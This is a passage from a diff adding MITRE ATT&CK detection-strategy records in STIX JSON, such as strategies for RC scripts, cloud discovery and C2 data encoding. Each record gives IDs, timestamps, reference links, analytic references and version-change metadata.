+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--be6a466c-40c6-4611-9b68-7cfcbcb35fb0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0237",
+                            "external_id": "DET0237"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--98f8728d-ff74-47cb-b884-25071a21f77e",
+                        "x-mitre-analytic--e716b209-5b06-4bc4-843f-cbe4c51ddc0d",
+                        "x-mitre-analytic--69562961-14e6-42a7-9f8a-24ac00f6404e",
+                        "x-mitre-analytic--b053dbd4-ad1e-45e1-a6b7-af2a5d931c82"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--62b445ed-7d9d-4c1a-8d4e-6c742ec1b0e2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0459",
+                            "external_id": "DET0459"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Build Image on Host",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f568a973-fb34-41aa-950f-f46457544564"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fda20a62-ad83-4d45-8a65-84883b07707b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0545",
+                            "external_id": "DET0545"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Administration Command",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d8d5a1c0-9ba1-4735-af42-3d5b9d7a6603"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8bc479cf-727b-40d1-92d2-5755766d8544",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0539",
+                            "external_id": "DET0539"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Application Integration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6feb9746-7b2c-4f6f-92c9-bfdb14eddddc",
+                        "x-mitre-analytic--036a6a5d-bd87-45c7-bd68-43df76167786"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--22331b2d-e8a1-4820-ae6b-7d04f24f7df7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0169",
+                            "external_id": "DET0169"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Infrastructure Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a9372c6a-8d3b-420a-ad9d-8ef8d284205f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a9351ea0-8379-47cd-a5c5-c5cf424249ef",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0402",
+                            "external_id": "DET0402"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Service Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fe8c1ef5-59ed-40c3-b7f6-eb560555ee22",
+                        "x-mitre-analytic--e2dd9fee-91b7-4e32-8031-69ed4d7b927c",
+                        "x-mitre-analytic--19b6de3a-032f-4dc8-aa72-7cd952dfed59",
+                        "x-mitre-analytic--a0730d9f-0a05-4153-8c6a-6f04f9f7346c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e769419e-39f6-478d-97b8-cf0672fa635b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0147",
+                            "external_id": "DET0147"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Service Hijacking via SaaS Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--01967eb2-5169-4113-aff0-ac2180fd14d9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c4f5335d-8e85-4b45-86b1-1d5a8cc6523d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0578",
+                            "external_id": "DET0578"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Cloud Storage Object Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--be55aa59-62b5-40cd-bab2-dbc4de80da0e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--72d668ba-f4d1-43ff-b7b1-0dbad9ec6ed9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0505",
+                            "external_id": "DET0505"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Command Obfuscation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e6e98024-2fa7-444c-af90-32ec5d4d2666",
+                        "x-mitre-analytic--cad9e775-f40f-42fb-8e86-c7aba249a8e4",
+                        "x-mitre-analytic--20157d55-1760-483c-a3b1-c6e219eeb75c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--48d80184-842f-419a-ab84-01030f866bd4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0501",
+                            "external_id": "DET0501"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Compile After Delivery - Source Code to Executable Transformation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3cd889a5-7955-4d38-a49b-89e8d276ceab",
+                        "x-mitre-analytic--774d555e-b94b-4dbd-bc3b-fb60d55e6e2d",
+                        "x-mitre-analytic--56a814a9-2b6b-4fcc-a530-e9ca62faaa17"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f3d5d1d5-3d80-46b2-be05-f0c438625230",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0281",
+                            "external_id": "DET0281"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Compressed Payload Creation and Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--18253101-bce9-453e-ab03-603bbd174552",
+                        "x-mitre-analytic--55083ce8-b00e-4501-97db-829082bdbb48",
+                        "x-mitre-analytic--62afd8a1-550d-43a6-a56a-7d5ae5abbcf6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e9a74ecb-cc65-4c21-ae40-850e3317c248",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0065",
+                            "external_id": "DET0065"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Container Administration Command Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ab1122c5-f459-4097-8ba7-f5a7960d2da5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2f4449cb-0eec-4871-bff3-f846f12bec15",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0490",
+                            "external_id": "DET0490"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Container and Resource Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3947e311-cada-4eab-b4fd-1ea1f3fc3485"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7a084a47-c4ea-4996-8d23-ffe0b19206fb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0349",
+                            "external_id": "DET0349"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Content Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8384d942-2f83-4968-9959-fd2f55afb311",
+                        "x-mitre-analytic--5e8af32c-5246-43e1-a7d9-c4d263c7b135",
+                        "x-mitre-analytic--ba6a9282-30e0-491c-90a7-35bf4ad25ba3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d7106707-eee8-443f-b106-e7eff58a739e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0108",
+                            "external_id": "DET0108"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Data Encoding in C2 Channels",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f979bacd-580c-4948-b501-c42dd4a8cb92",
+                        "x-mitre-analytic--d32cc2a4-60ed-4761-809e-a59cde2a1881",
+                        "x-mitre-analytic--2bf1ce64-970b-4d0d-bf5f-a854fc6d7235",
+                        "x-mitre-analytic--cb428c22-0a5a-44c9-ae63-6b1bedb34fee"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cce3ccaf-87ac-47ae-b9e2-6507b91cb63d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0059",
+                            "external_id": "DET0059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Data Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--64d6b35c-4785-4e2b-bc93-1f54f626a7a7",
+                        "x-mitre-analytic--2e700f3b-bf9c-427c-a099-b80d233c1ccb",
+                        "x-mitre-analytic--13f8d339-8239-4d84-adf2-1abf1a0f3d5d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d96f78ad-21cd-45dc-940a-63b348894728",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0213",
+                            "external_id": "DET0213"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Data Transfer Size Limits and Chunked Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1e9fdc71-d073-403a-9ee9-bab091318454",
+                        "x-mitre-analytic--4baad14d-46b1-4e96-9e2a-138ae4e3ec75",
+                        "x-mitre-analytic--d0edef63-9a98-4435-9f4b-2c577c7de41d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
